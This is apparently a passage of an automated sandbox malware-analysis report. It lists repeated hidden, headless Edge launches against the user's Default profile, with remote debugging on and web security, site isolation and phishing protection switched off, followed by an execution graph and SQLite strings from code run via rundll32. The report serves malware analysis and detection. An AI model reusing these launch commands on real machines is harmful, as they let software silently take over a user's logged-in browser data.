                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9268 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                              Imagebase:0x7ff67dcd0000
                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                              Start time:07:12:21
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1584 --field-trial-handle=1428,i,17945505886261408641,13113547458028761816,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                                                              Imagebase:0x7ff67dcd0000
                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                              Start time:07:12:45
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9231 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                              Imagebase:0x7ff67dcd0000
                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                              Start time:07:12:46
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1512 --field-trial-handle=1404,i,8570248948414789044,17269091163832771516,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                                                              Imagebase:0x7ff67dcd0000
                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                              Start time:07:13:10
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9582 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                              Imagebase:0x7ff67dcd0000
                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                              Start time:07:13:11
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1580 --field-trial-handle=1496,i,17156741464264009395,10585309956267009794,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                                                              Imagebase:0x7ff67dcd0000
                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                              Start time:07:13:43
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9694 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                              Imagebase:0x7ff67dcd0000
                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                              Start time:07:13:43
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1504 --field-trial-handle=1404,i,7222753251508312572,843562090488949947,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                                                              Imagebase:0x7ff67dcd0000
                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                              Start time:07:14:08
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9487 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
                                                                                                                                                                                              Imagebase:0x7ff67dcd0000
                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                              Start time:07:14:08
                                                                                                                                                                                              Start date:14/01/2025
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1660 --field-trial-handle=1472,i,14150613680771438782,17375092338205965150,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
                                                                                                                                                                                              Imagebase:0x7ff67dcd0000
                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Reset < >
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000A.00000002.1869288871.00007FFDF9BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFDF9BF0000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000A.00000002.1869252826.00007FFDF9BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000A.00000002.1870544589.00007FFDFA824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000A.00000002.1870544589.00007FFDFB224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000A.00000002.1870544589.00007FFDFB405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000A.00000002.1870544589.00007FFDFB42E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000A.00000002.1870544589.00007FFDFB431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000A.00000002.1872771128.00007FFDFB7BB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000A.00000002.1872816624.00007FFDFB7C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000A.00000002.1872890137.00007FFDFB7FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000A.00000002.1872924531.00007FFDFB7FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffdf9bf0000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                • Opcode ID: 07f44f13d228468b3a7c5f48714941a365ecf3302e810ad5fd32ac12285b8e82
                                                                                                                                                                                                • Instruction ID: bca9da7d52d67133f82ab0f4286cc6ae0f4a1a32645885d0ac7067c3e69f8494
                                                                                                                                                                                                • Opcode Fuzzy Hash: 07f44f13d228468b3a7c5f48714941a365ecf3302e810ad5fd32ac12285b8e82
                                                                                                                                                                                                • Instruction Fuzzy Hash: BA111826B25F068AEB00CF60E8646B833A4FB59758F440E35EE6D877A8EF78D1548340

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:1%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                Signature Coverage:15.9%
                                                                                                                                                                                                Total number of Nodes:208
                                                                                                                                                                                                Total number of Limit Nodes:46
                                                                                                                                                                                                execution_graph 106856 7ffdfb926570 106859 7ffdfba01b00 106856->106859 106858 7ffdfb926597 106860 7ffdfba01b2b _raise_excf 106859->106860 106862 7ffdfba01b7e _raise_excf 106859->106862 106860->106858 106862->106860 106863 7ffdfba0baa0 106862->106863 106864 7ffdfba0bb0f new[] _raise_excf 106863->106864 106865 7ffdfba0bdc1 106864->106865 106867 7ffdfba0bb89 _raise_excf 106864->106867 106869 7ffdfba0bcae _raise_excf 106864->106869 106874 7ffdfba10440 106865->106874 106867->106862 106868 7ffdfba0be54 106868->106867 106879 7ffdfba2cc90 23 API calls _raise_excf 106868->106879 106869->106867 106870 7ffdfba10440 _raise_excf GetSystemInfo 106869->106870 106873 7ffdfba0bd45 _raise_excf 106869->106873 106870->106873 106873->106867 106873->106868 106878 7ffdfb9c22f0 19 API calls _raise_excf 106873->106878 106875 7ffdfba10490 _raise_excf 106874->106875 106877 7ffdfba107e1 _raise_excf 106875->106877 106880 7ffdfba05f60 106875->106880 106877->106873 106878->106868 106879->106867 106881 7ffdfba05fa1 _raise_excf 106880->106881 106882 7ffdfba0608e 106881->106882 106885 7ffdfba060ad _raise_excf 106881->106885 106886 7ffdfba57490 GetSystemInfo new[] _raise_excf 106881->106886 106882->106885 106887 7ffdfba57490 GetSystemInfo new[] _raise_excf 106882->106887 106885->106875 106886->106881 106887->106885 106888 7ffdfb925430 106893 7ffdfba3b8a0 106888->106893 106890 7ffdfb9254f9 _raise_excf 106891 7ffdfb92544c new[] _raise_excf 106891->106890 106904 7ffdfb9af5d0 106891->106904 106894 7ffdfba3b8ad 106893->106894 106895 7ffdfba3b8b5 new[] _raise_excf 106893->106895 106894->106891 106896 7ffdfba3b8a0 _raise_excf GetSystemInfo 106895->106896 106903 7ffdfba3bc14 106895->106903 106897 7ffdfba3bb0c new[] _raise_excf 106896->106897 106897->106903 106915 7ffdfba3be70 GetSystemInfo 106897->106915 106899 7ffdfba3bb32 106900 7ffdfba3b8a0 _raise_excf GetSystemInfo 106899->106900 106899->106903 106902 7ffdfba3bb41 106900->106902 106901 7ffdfba3b8a0 _raise_excf GetSystemInfo 106901->106903 106902->106901 106902->106903 106903->106891 106905 7ffdfba3b8a0 _raise_excf GetSystemInfo 106904->106905 106907 7ffdfb9af607 new[] 106905->106907 106909 7ffdfb9af892 106907->106909 106910 7ffdfb9af9da _raise_excf 106907->106910 106914 7ffdfb9af6a6 _raise_excf 106907->106914 106925 7ffdfba057f0 GetSystemInfo new[] _raise_excf 106907->106925 106909->106914 106917 7ffdfb9cdf40 106909->106917 106910->106890 106912 7ffdfb9afa40 _raise_excf 106912->106914 106926 7ffdfb933030 GetSystemInfo _raise_excf 106912->106926 106914->106910 106927 7ffdfb9d00e0 19 API calls _raise_excf 106914->106927 106916 7ffdfba3beaa _raise_excf 106915->106916 106916->106899 106918 7ffdfb9cdf8f new[] _raise_excf 106917->106918 106922 7ffdfb9ce0a5 _raise_excf 106918->106922 106923 7ffdfb9ce374 _raise_excf 106918->106923 106928 7ffdfba040d0 106918->106928 106920 7ffdfb9ce2ea _raise_excf 106920->106923 106932 7ffdfb9136f0 106920->106932 106922->106912 106923->106922 106938 7ffdfba038b0 19 API calls _raise_excf 106923->106938 106925->106909 106926->106914 106927->106910 106929 7ffdfba0415e new[] _raise_excf 106928->106929 106930 7ffdfba043d6 _raise_excf 106929->106930 106939 7ffdfb914510 106929->106939 106930->106920 106936 7ffdfb91371d _raise_excf 106932->106936 106933 7ffdfb9137a0 ReadFile 106934 7ffdfb913734 new[] _raise_excf 106933->106934 106933->106936 106934->106923 106935 7ffdfb913830 106950 7ffdfba51a30 8 API calls _raise_excf 106935->106950 106936->106933 106936->106934 106936->106935 106938->106922 106943 7ffdfb914561 _raise_excf 106939->106943 106941 7ffdfb9147c0 CreateFileW 106941->106943 106943->106941 106944 7ffdfb914a72 106943->106944 106946 7ffdfb9149d1 _raise_excf 106943->106946 106947 7ffdfba51210 9 API calls 2 library calls 106943->106947 106948 7ffdfb917490 8 API calls _raise_excf 106943->106948 106949 7ffdfba51a30 8 API calls _raise_excf 106944->106949 106946->106930 106947->106943 106948->106943 106949->106946 106950->106934 106951 7ffdfba15d90 106952 7ffdfba15db6 106951->106952 106953 7ffdfba15e8e 106951->106953 106952->106953 106954 7ffdfba15df7 106952->106954 106955 7ffdfba2fa20 23 API calls 106952->106955 106961 7ffdfba2fa20 106954->106961 106955->106954 106958 7ffdfba2fa20 23 API calls 106959 7ffdfba15e5a 106958->106959 106959->106953 106960 7ffdfba2fa20 23 API calls 106959->106960 106960->106953 106962 7ffdfba15e21 106961->106962 106966 7ffdfba2fa37 106961->106966 106962->106953 106962->106958 106963 7ffdfba2f940 23 API calls 106963->106966 106965 7ffdfba2fa20 23 API calls 106965->106966 106966->106962 106966->106963 106966->106965 106968 7ffdfb9c2570 106966->106968 106977 7ffdfba4a3f0 23 API calls 106966->106977 106973 7ffdfb9c25c5 new[] _raise_excf 106968->106973 106976 7ffdfb9c25c9 _raise_excf 106968->106976 106970 7ffdfba2fa20 23 API calls 106970->106973 106973->106970 106973->106973 106973->106976 106978 7ffdfb9bcd40 106973->106978 106991 7ffdfba018e0 106973->106991 106995 7ffdfb9d24b0 GetSystemInfo new[] _raise_excf 106973->106995 106996 7ffdfba45f40 23 API calls _raise_excf 106973->106996 106997 7ffdfba163d0 23 API calls _raise_excf 106973->106997 106976->106966 106977->106966 106980 7ffdfb9bce1f _raise_excf 106978->106980 106981 7ffdfb9bcd79 new[] _raise_excf 106978->106981 106980->106973 106981->106980 106998 7ffdfba163d0 23 API calls _raise_excf 106981->106998 106982 7ffdfb9bd2e0 106984 7ffdfba2fa20 23 API calls 106982->106984 106983 7ffdfb9bd124 106986 7ffdfba2fa20 23 API calls 106983->106986 106987 7ffdfb9bd13c 106984->106987 106985 7ffdfb9bd08b 106985->106980 106985->106982 106985->106983 106986->106987 106987->106980 106987->106987 106999 7ffdfb9d24b0 GetSystemInfo new[] _raise_excf 106987->106999 106989 7ffdfb9bd320 106989->106980 106990 7ffdfba2fa20 23 API calls 106989->106990 106990->106980 106992 7ffdfba0190c 106991->106992 106994 7ffdfba01911 _raise_excf 106991->106994 107000 7ffdfba0d630 106992->107000 106994->106973 106995->106973 106996->106973 106997->106973 106998->106985 106999->106989 107001 7ffdfba0d649 107000->107001 107003 7ffdfba0d655 107000->107003 107004 7ffdfb9fda40 107001->107004 107003->106994 107005 7ffdfb9fda7c 107004->107005 107009 7ffdfb9fda89 107004->107009 107010 7ffdfb9fde10 107005->107010 107007 7ffdfb9fdadd 107007->107003 107008 7ffdfb9fde10 _raise_excf 23 API calls 107008->107009 107009->107007 107009->107008 107021 7ffdfb9fdb10 107010->107021 107012 7ffdfb9fdec4 _raise_excf 107014 7ffdfb9fdeeb _raise_excf 107012->107014 107015 7ffdfb9fdf39 _raise_excf 107012->107015 107030 7ffdfb942010 107012->107030 107014->107009 107015->107014 107016 7ffdfb9fdfe9 _raise_excf 107015->107016 107039 7ffdfb922f50 107015->107039 107016->107014 107050 7ffdfb9cc1d0 19 API calls _raise_excf 107016->107050 107019 7ffdfb9fe271 _raise_excf 107019->107016 107049 7ffdfb9c90d0 23 API calls _raise_excf 107019->107049 107022 7ffdfb9fdb32 _raise_excf 107021->107022 107026 7ffdfb9fdb3b _raise_excf 107021->107026 107023 7ffdfba0baa0 _raise_excf 23 API calls 107022->107023 107022->107026 107024 7ffdfb9fdc20 _raise_excf 107023->107024 107024->107026 107051 7ffdfba2cc90 23 API calls _raise_excf 107024->107051 107026->107012 107027 7ffdfb9fdd0f _raise_excf 107052 7ffdfba00790 19 API calls _raise_excf 107027->107052 107029 7ffdfb9fdd35 107029->107012 107034 7ffdfb94204b _raise_excf 107030->107034 107031 7ffdfb9420a6 _raise_excf 107031->107015 107034->107031 107035 7ffdfb942262 107034->107035 107053 7ffdfb9a96b0 107034->107053 107062 7ffdfb9b1310 17 API calls _raise_excf 107034->107062 107063 7ffdfba03700 RaiseException _raise_excf 107034->107063 107064 7ffdfb9ae860 GetSystemInfo _raise_excf 107034->107064 107035->107031 107065 7ffdfb9b1530 GetSystemInfo _raise_excf 107035->107065 107045 7ffdfb922f77 new[] _raise_excf 107039->107045 107047 7ffdfb922f80 _raise_excf 107039->107047 107040 7ffdfba01b00 _raise_excf 23 API calls 107040->107047 107044 7ffdfb9234b8 107044->107045 107113 7ffdfba2cc90 23 API calls _raise_excf 107044->107113 107045->107019 107047->107040 107047->107044 107047->107045 107048 7ffdfb9234a1 _raise_excf 107047->107048 107103 7ffdfb929dd0 107047->107103 107112 7ffdfba2cc90 23 API calls _raise_excf 107047->107112 107048->107045 107114 7ffdfba2cc90 23 API calls _raise_excf 107048->107114 107049->107016 107050->107014 107051->107027 107052->107029 107066 7ffdfba04fe0 107053->107066 107055 7ffdfb9a96c1 107060 7ffdfb9a97f2 _raise_excf 107055->107060 107074 7ffdfb99e4b0 107055->107074 107056 7ffdfb9a97e1 _raise_excf 107056->107060 107084 7ffdfb9b1310 17 API calls _raise_excf 107056->107084 107057 7ffdfb9a96e8 107057->107056 107057->107060 107080 7ffdfba04980 107057->107080 107060->107034 107062->107034 107063->107034 107064->107034 107065->107031 107067 7ffdfba052c0 _raise_excf 107066->107067 107070 7ffdfba05010 _raise_excf 107066->107070 107071 7ffdfba050af _raise_excf 107067->107071 107085 7ffdfba2ed30 107067->107085 107069 7ffdfba051b4 _raise_excf 107069->107067 107069->107071 107073 7ffdfba04980 _raise_excf 10 API calls 107069->107073 107070->107067 107070->107069 107070->107071 107091 7ffdfb9b1ee0 GetSystemInfo _raise_excf 107070->107091 107071->107055 107073->107067 107076 7ffdfb99e505 _raise_excf 107074->107076 107078 7ffdfb99e4d2 new[] _raise_excf 107074->107078 107076->107078 107079 7ffdfb99e5f6 _raise_excf 107076->107079 107092 7ffdfb9b8340 107076->107092 107078->107057 107079->107078 107098 7ffdfb9b1310 17 API calls _raise_excf 107079->107098 107081 7ffdfba049e5 107080->107081 107082 7ffdfba04995 107080->107082 107081->107056 107082->107081 107099 7ffdfb9b0b50 107082->107099 107084->107060 107087 7ffdfba2ed6d _raise_excf 107085->107087 107086 7ffdfba49c70 _raise_excf 17 API calls 107086->107087 107087->107086 107088 7ffdfba2edd0 _raise_excf 107087->107088 107089 7ffdfba2ee01 _raise_excf 107087->107089 107088->107071 107089->107088 107090 7ffdfb9c2470 _raise_excf RaiseException 107089->107090 107090->107088 107091->107069 107093 7ffdfb9b836a 107092->107093 107094 7ffdfb9b8377 107092->107094 107095 7ffdfba2f510 _raise_excf 16 API calls 107093->107095 107096 7ffdfb9b8387 107094->107096 107097 7ffdfb9136f0 9 API calls 107094->107097 107095->107094 107096->107079 107097->107096 107098->107078 107100 7ffdfb9b0b60 new[] _raise_excf 107099->107100 107101 7ffdfb9b0c41 _raise_excf 107100->107101 107102 7ffdfb914510 10 API calls 107100->107102 107101->107081 107102->107101 107104 7ffdfb929df0 107103->107104 107105 7ffdfb929de7 _raise_excf 107103->107105 107104->107105 107115 7ffdfba17db0 107104->107115 107105->107047 107109 7ffdfb929e69 107110 7ffdfba17db0 _raise_excf 23 API calls 107109->107110 107111 7ffdfb929ec1 _raise_excf 107109->107111 107119 7ffdfba0e5c0 23 API calls _raise_excf 107109->107119 107120 7ffdfb92b090 23 API calls _raise_excf 107109->107120 107110->107109 107111->107047 107112->107047 107113->107045 107114->107045 107116 7ffdfba17dcd 107115->107116 107118 7ffdfba17dec _raise_excf 107115->107118 107116->107118 107121 7ffdfb92b090 23 API calls _raise_excf 107116->107121 107118->107109 107119->107109 107120->107109 107121->107116 107122 7ffdfb9aba40 107125 7ffdfb9aba70 _raise_excf 107122->107125 107123 7ffdfb9abbbc _raise_excf 107125->107123 107126 7ffdfb99cc00 107125->107126 107127 7ffdfb99cc1d _raise_excf 107126->107127 107128 7ffdfb99cc64 107126->107128 107127->107125 107130 7ffdfb99e4b0 17 API calls 107128->107130 107129 7ffdfb99cc79 _raise_excf 107129->107125 107130->107129
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595388557.00007FFDFB910000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595558875.00007FFDFBAAD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595582036.00007FFDFBAB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595604413.00007FFDFBAB3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000000E.00000002.2595625382.00007FFDFBAB6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ffdfb910000_rundll32.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$:memory:$API call with %s database connection pointer$BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$invalid$main$misuse$temp$v
                                                                                                                                                                                                • API String ID: 0-534082081
                                                                                                                                                                                                • Opcode ID: 40270c28c6edc3b06c352269960f6987713dd140cd1f910db5668987d847cd04
                                                                                                                                                                                                • Instruction ID: ce6bd0179eab62ec0a99093b9dbe92b6f672e0179b5baa3e77eb43eb72fae6b4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 40270c28c6edc3b06c352269960f6987713dd140cd1f910db5668987d847cd04
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F427925B0AB4381EB649F25A860B7937A9FB44B88F544136C9AD4B7FDCFBCE5458300
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2595410070.00007FFDFB911000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB910000, based on PE: true
